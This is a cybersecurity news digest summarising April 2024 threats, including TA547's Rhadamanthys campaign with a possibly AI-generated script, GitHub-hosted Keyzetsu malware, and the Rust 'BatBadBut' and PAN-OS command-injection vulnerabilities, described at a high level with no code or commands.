Threat Alerts

A recent cyber campaign targeting German organizations showcased a rising trend in the cyber landscape – the utilization of AI to craft malicious scripts.

The attack, attributed to threat actor TA547, featured the deployment of the Rhadamanthys information stealer. TA547, also known as Scully Spider, has a history of malware dissemination and has recently incorporated Rhadamanthys, enhancing its data collection capabilities. This marks the first known instance of Rhadamanthys within TA547’s operations.

The PowerShell script employed in the campaign displayed distinctive characteristics, including meticulously commented lines, indicative of potential AI involvement in its creation. Although not definitively confirmed, evidence strongly suggests TA547’s adoption of generative AI technology for script development.

This incident underscores the emerging trend of threat actors harnessing AI to generate sophisticated attack tools, posing significant challenges to cybersecurity defenses.

Microsoft’s April 2024 Patch Patch Tuesday updates address around 150 vulnerabilities, including two Windows issues that seem to have been actively targeted.

Fortinet issued critical security patches for a flaw in FortiClientLinux allowing attackers to run arbitrary code execution.

Cybercriminals increasingly target developers by planting malicious libraries on platforms like PyPi and NPM, inserting backdoors in code snippets, as well as exploiting GitHub’s widespread use. These tactics could potentially lead to damaging supply chain attacks.

Recently, attackers have been distributing Keyzetsu malware through Visual Studio projects on GitHub. They manipulated the GitHub search by setting up repositories with enticing names and fake stars to spread malware. These repositories trick users into downloading harmful code by appearing legitimate and popular.

The malware is embedded in Visual Studio project files, which run upon building the project. It is designed to tailor its payload by detecting the victim’s location, avoiding targets in Russia. The recent malware campaign involves a large, executable file that shares similarities with the “Keyzetsu clipper” malware, targeting cryptocurrency wallets.

Using GitHub Actions, cybercriminals frequently update repositories to make them more visible on search results, particularly when users filter by recent updates, making these malicious projects more likely to be stumbled upon.

Additionally, this week, a critical vulnerability in the Rust programming language came to light, cataloged under CVE-2024-24576. Named “BatBadBut,” it affects instances where Windows batch files are run using parameters that have not been verified as trustworthy. An attacker exploiting this flaw could potentially initiate command injection on Windows-based software that utilizes the CreateProcess function indirectly, under specific circumstances.

CVE-2024-24576 is present in all Rust versions up to 1.77.2. The researcher who reported the vulnerability suggests that its overall impact is contingent upon how the compromised language or component is implemented. Given that not all programming languages have remedied this issue, developers are advised to proceed with caution when invoking commands on Windows.

An actively exploited critical flaw has been identified in Palo Alto Networks’ PAN-OS software, attributable to nation-backed attackers since the end of March. The vulnerability, tracked as CVE-2024-3400, is a command injection issue situated within the GlobalProtect component of the PAN-OS software.

A critical security flaw was identified in the Rust programming language’s standard library, specifically affecting the way it handles arguments for batch files on Windows systems. This vulnerability, designated CVE-2024-24576 (CVSS Score 10), arises from the library’s failure to properly escape arguments when using the Command API to execute batch files. As a result, attackers with the ability to manipulate these arguments could potentially execute unauthorized shell commands, compromising system security.